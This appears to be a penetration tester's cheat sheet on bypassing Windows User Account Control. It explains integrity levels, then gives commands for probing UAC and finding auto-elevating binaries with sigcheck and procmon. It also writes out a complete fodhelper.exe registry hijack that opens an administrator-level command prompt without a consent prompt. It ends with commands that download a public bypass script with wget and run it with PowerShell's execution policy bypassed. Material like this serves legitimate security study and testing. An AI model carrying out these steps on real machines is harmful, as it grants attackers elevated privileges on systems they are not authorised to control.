User Account Control (UAC) Bypass

Privilege escalation techniques on Windows by bypassing User Account Control (UAC).

Windows generates an access token that describes the security context when a user successfully logs in. The information in the token includes the identity and privileges of the user account associated with the process or thread. Tokens have a unique security identifier (SID). SIDs are managed by the Windows Local Security Authority.

Windows integrity mechanism restricts the access permissions of applications that are running under the same user account and that are less trustworthy using integrity levels.

  • 0x0000, Untrusted level
  • 0x1000 (S-1-16-4096), Low integrity level, restricted rights (sandboxed processes)
  • 0x2000 (S-1-16-8192), Medium integrity level, standard user rights
  • 0x3000 (S-1-16-12288), High integrity level, administrative rights
  • 0x4000 (S-1-16-16384), System integrity level, system rights

UAC Bypass techniques target specific OS versions.

See PowerUp.

Current user integrity level

whoami /groups

Check UAC

If EnableLUA is 0x1, it means that UAC is enabled.

reg query HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ 

Open command prompt with high integrity level

powershell.exe Start-Process cmd.exe -Verb runAs

Manual Bypass – Full File System Access (read/write)

Not working…

net use Z: \\127.0.0.1\c$
cd c$

Working 🙂

dir \\127.0.0.1\c$\Users\Administrator\Desktop

Manual Bypass

Search exploits on the specific OS version. See what process seems vulnerable.

Inspect application manifest

Use sigcheck from SysInternals. -a: extended information, -m: manifest

sigcheck.exe -accepteula -a -m C:\Windows\System32\<vulnerable process>
sigcheck.exe -a -m C:\Windows\System32\winSAT.exe | findstr /i admin
sigcheck.exe -a -m C:\Windows\System32\winSAT.exe | findstr /i elevate

Look for:

<requestedExecutionLevel level="requireAdministrator" />
<autoElevate>true</autoElevate>

Inspect Process

Use procmon from SysInternals.

procmon.exe -accepteula

Set Filter to:

Process Nameis<vulnerable process>
OperationcontainsReg
ResultisNAME NOT FOUND
PathcontainsHKCU

Add the registry key. See fodhelper example.

Bypass UAC with fodhelper.exe

fodhelper.exe runs with high integrity level on Windows 10. It uses registry keys that can be modified without administrative privileges.

Elevate integrity level from Medium to High

Affected versions: Windows 10 1709, Windows 10.0.15063 (WHEN WAS IT FIXED?)

Need to be logged as an administrator. fodhelper runs as administrator and autoelevate (no consent prompt).

List registry (recursively)

reg query HKCU\Software\Classes\ms-settings\Shell\Open /s

Add the missing registry

REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command
REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ

Assign an executable in the registry key

REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /d "cmd.exe" /f

Start fodhelper and a command prompt with High integrity will open without a consent prompt.

C:\Windows\System32\fodhelper.exe

Using exploit

Not tested, but Metasploit module is based on this.

wget https://raw.githubusercontent.com/winscripting/UAC-bypass/master/FodhelperBypass.ps1
copy \\x.x.x.x\myshare\FodhelperBypass.ps1 FodhelperBypass.ps1
powershell -exec bypass
Import-Module .\FodhelperBypass.ps1
FodhelperBypass -program "cmd.exe"